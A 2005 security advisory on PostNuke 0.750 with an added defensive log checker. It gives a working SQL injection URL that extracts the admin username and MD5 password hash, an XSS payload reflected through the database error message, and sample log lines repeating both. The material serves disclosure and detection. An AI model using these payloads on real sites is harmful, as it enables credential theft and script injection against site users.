PostNuke0750.txt

14 Aug 2005 | Reported by sp3x | Type: packetstorm | Source: packetstormsecurity.com

Critical SQL injection and XSS in PostNuke. PostNuke 0.750 vulnerable to SQL injection and XSS attacks. Vulnerable file: readpmsg.ph

Code
`  
  
-=[ Critical SQL injection and XSS in PostNuke ]=-  
  
Author: sp3x  
Date: 27. May 2005  
  
Affected software :  
===================  
PostNuke version : x=> 0.750  
  
Description :  
=============  
PostNuke is an open source, open development content management system  
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and  
provides many enhancements and improvements over the PHP-Nuke system. PostNuke  
is still undergoing development but a large number of core functions are now  
stabilising and a complete API for third-party developers is now in place.  
If you would like to help develop this software, please visit our homepage  
at http://noc.postnuke.com/  
You can also visit us on our IRC Server irc.postnuke.com channel  
#postnuke-support  
#postnuke-chat  
#postnuke  
Or at the Community Forums located at:  
http://forums.postnuke.com/  
  
Vulnerabilities :  
*****************  
  
Critical SQL injection :  
========================  
  
Code :  
------  
  
/modules/Messages/readpmsg.php  
  
=======================  
$sql = "SELECT $column[msg_id] AS \"msg_id\",  
$column[msg_image] AS \"msg_image\",  
$column[subject] AS \"subject\",  
$column[from_userid] AS \"from_userid\",  
$column[to_userid] AS \"to_userid\",  
$column[msg_time] AS \"msg_time\",  
$column[msg_text] AS \"msg_text\",  
$column[read_msg] AS \"read_msg\"  
FROM $pntable[priv_msgs]  
WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata) . "'";  
  
$resultID =& $dbconn->SelectLimit($sql,1,$start);  
if($dbconn->ErrorNo()<>0) {  
error_log("DB Error: " . $dbconn->ErrorMsg());  
echo $dbconn->ErrorMsg() . "<br />";  
forumerror(0005);  
}  
=======================  
  
First, log in to PostNuke as a user, then send a message to yourself.  
After that go to :  
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0[SQL inj]&total_messages=1  
  
Note :  
------  
total_messages=1 - the id of total_messages must exist  
  
Now you will see this error message   
  
error message :  
---------------  
========================  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[SQL injection],1' at line 10  
========================  
  
Exploit SQL injection :  
=======================  
  
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1  
  
And we can see the admin md5 password and nick :)  
  
Cross-site scripting - XSS :  
============================  
  
Thanks to the error message, we can also perform XSS attacks :)  
  
Example :  
---------  
  
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0'<h1>cXIb8O3 and sp3x - SecurityReason</h1>&total_messages=1  
  
And we get :  
  
error message :  
---------------  
========================  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''[Our XSS],1' at line 10  
========================  
  
How to fix :  
============  
  
PNSA 2005-2  
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)  
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html  
SHA1: 6e76d92124c833618d02dfdb87d699374120967d  
MD5: a007e741be11389a986b1d8928a6c0e5  
Size: 160550 Bytes  
  
or CVS  
  
Greets :  
========  
  
cXIb8O3 and pkw :)  
  
Contact :  
=========  
  
sp3x[at]securityreason[dot].com  
www.securityreason.com  
`
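
Added example (not part of the original advisory or of PostNuke's code): a Python access-log check that flags `readpmsg` requests whose `start` or `total_messages` value is not a plain integer, since the advisory's URLs carry both the SQL injection and the XSS in `start`, which the quoted code passes to `SelectLimit()`. The log lines and the `/nuke/` path are constructed samples, and treating `total_messages` as numeric is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the advisory); /nuke/ is a made-up path.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Aug/2005:10:00:01 +0000] "GET /nuke/modules.php?op=modload'
    '&name=Messages&file=readpmsg&start=0&total_messages=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [14/Aug/2005:10:02:17 +0000] "GET /nuke/modules.php?op=modload'
    '&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%201&total_messages=1 HTTP/1.1" 200 4890',
    '192.0.2.44 - - [14/Aug/2005:10:03:40 +0000] "GET /nuke/modules.php?op=modload'
    '&name=Messages&file=readpmsg&start=0%27%3Ch1%3Ex%3C/h1%3E&total_messages=1 HTTP/1.1" 200 731',
    '192.0.2.10 - - [14/Aug/2005:10:05:02 +0000] "GET /nuke/modules.php?op=modload'
    '&name=News&file=article&sid=7 HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# start feeds SelectLimit() as the row offset; total_messages is assumed numeric too.
NUMERIC_PARAMS = ("start", "total_messages")


def check_request(target):
    """Return (param, decoded value) pairs that are not plain ASCII integers."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("modules.php"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    module = query.get("name", [""])[-1].lower()
    page = query.get("file", [""])[-1].lower()
    if (module, page) != ("messages", "readpmsg"):
        return []  # only the Messages/readpmsg page is in scope here
    return [(param, value)
            for param in NUMERIC_PARAMS
            for value in query.get(param, [])
            if not re.fullmatch(r"[0-9]+", value)]


def scan(lines):
    """Return (line number, param, value) for every suspicious readpmsg request."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            findings.extend((lineno, p, v) for p, v in check_request(match.group(1)))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule is what the server side should enforce on `start` before it reaches the query, with database error text HTML-escaped or kept out of the response.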
